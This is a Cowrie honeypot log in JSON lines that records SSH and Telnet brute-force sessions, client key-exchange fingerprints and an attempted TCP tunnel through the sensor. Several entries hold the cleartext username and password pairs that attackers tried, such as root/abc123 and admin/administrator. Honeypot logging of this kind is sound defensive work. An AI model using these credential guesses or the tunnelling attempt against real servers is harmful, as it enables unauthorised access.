{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T21:14:29.627119Z","src_ip":"212.227.235.229","session":"d3cfc9fd7560"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:14:30.026958Z","src_ip":"212.227.235.229","session":"d3cfc9fd7560"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T21:14:30.160847Z","session":"d3cfc9fd7560"}
{"eventid":"cowrie.session.connect","src_ip":"120.46.163.82","src_port":28199,"dst_ip":"1.2.3.4","dst_port":22,"session":"db614d0cd0d2","protocol":"ssh","message":"New connection: 120.46.163.82:28199 (1.2.3.4:22) [session: db614d0cd0d2]","sensor":"my-vps","timestamp":"2025-08-26T21:14:31.951312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:14:31.952148Z","src_ip":"120.46.163.82","session":"db614d0cd0d2"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T21:14:32.157445Z","src_ip":"120.46.163.82","session":"db614d0cd0d2"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:14:32.362849Z","src_ip":"120.46.163.82","session":"db614d0cd0d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40796,"dst_ip":"1.2.3.4","dst_port":22,"session":"043c58a9fb8b","protocol":"ssh","message":"New connection: 212.227.235.229:40796 (1.2.3.4:22) [session: 043c58a9fb8b]","sensor":"my-vps","timestamp":"2025-08-26T21:14:38.729913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:14:38.751567Z","src_ip":"212.227.235.229","session":"043c58a9fb8b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:14:39.242899Z","src_ip":"212.227.235.229","session":"043c58a9fb8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40810,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e5e3fa1b62b","protocol":"ssh","message":"New connection: 212.227.235.229:40810 (1.2.3.4:22) [session: 5e5e3fa1b62b]","sensor":"my-vps","timestamp":"2025-08-26T21:14:39.553422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:14:39.910447Z","src_ip":"212.227.235.229","session":"5e5e3fa1b62b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:14:39.971499Z","src_ip":"212.227.235.229","session":"5e5e3fa1b62b"}
{"eventid":"cowrie.login.failed","username":"user100","password":"user100","message":"login attempt [user100/user100] failed","sensor":"my-vps","timestamp":"2025-08-26T21:14:40.566453Z","src_ip":"212.227.235.229","session":"043c58a9fb8b"}
{"eventid":"cowrie.login.failed","username":"strycek","password":"st13ip","message":"login attempt [strycek/st13ip] failed","sensor":"my-vps","timestamp":"2025-08-26T21:14:40.947552Z","src_ip":"212.227.235.229","session":"5e5e3fa1b62b"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:14:42.335027Z","src_ip":"212.227.235.229","session":"043c58a9fb8b"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:14:42.364973Z","src_ip":"212.227.235.229","session":"5e5e3fa1b62b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60915,"dst_ip":"1.2.3.4","dst_port":23,"session":"a6a6fbcbe269","protocol":"telnet","message":"New connection: 212.227.235.229:60915 (1.2.3.4:23) [session: a6a6fbcbe269]","sensor":"my-vps","timestamp":"2025-08-26T21:14:44.863210Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40858,"dst_ip":"1.2.3.4","dst_port":22,"session":"a49419d88190","protocol":"ssh","message":"New connection: 212.227.235.229:40858 (1.2.3.4:22) [session: a49419d88190]","sensor":"my-vps","timestamp":"2025-08-26T21:14:45.369117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:14:45.410820Z","src_ip":"212.227.235.229","session":"a49419d88190"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:14:45.619176Z","src_ip":"212.227.235.229","session":"a49419d88190"}
{"eventid":"cowrie.login.failed","username":"admin","password":"administrator","message":"login attempt [admin/administrator] failed","sensor":"my-vps","timestamp":"2025-08-26T21:14:46.741154Z","src_ip":"212.227.235.229","session":"a49419d88190"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:14:47.999129Z","src_ip":"212.227.235.229","session":"a49419d88190"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:14:48.259635Z","src_ip":"212.227.235.229","session":"1b87eec952dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44300,"dst_ip":"1.2.3.4","dst_port":22,"session":"13a369b3138a","protocol":"ssh","message":"New connection: 212.227.235.229:44300 (1.2.3.4:22) [session: 13a369b3138a]","sensor":"my-vps","timestamp":"2025-08-26T21:14:49.490073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:14:49.492031Z","src_ip":"212.227.235.229","session":"13a369b3138a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:14:49.993046Z","src_ip":"212.227.235.229","session":"13a369b3138a"}
{"eventid":"cowrie.login.failed","username":"open","password":"open","message":"login attempt [open/open] failed","sensor":"my-vps","timestamp":"2025-08-26T21:14:51.168612Z","src_ip":"212.227.235.229","session":"13a369b3138a"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:14:51.941272Z","src_ip":"212.227.235.229","session":"1b87eec952dc"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:14:53.754062Z","src_ip":"212.227.235.229","session":"13a369b3138a"}
{"eventid":"cowrie.session.closed","duration":12.403828382492065,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:14:57.266963Z","src_ip":"212.227.235.229","session":"a6a6fbcbe269"}
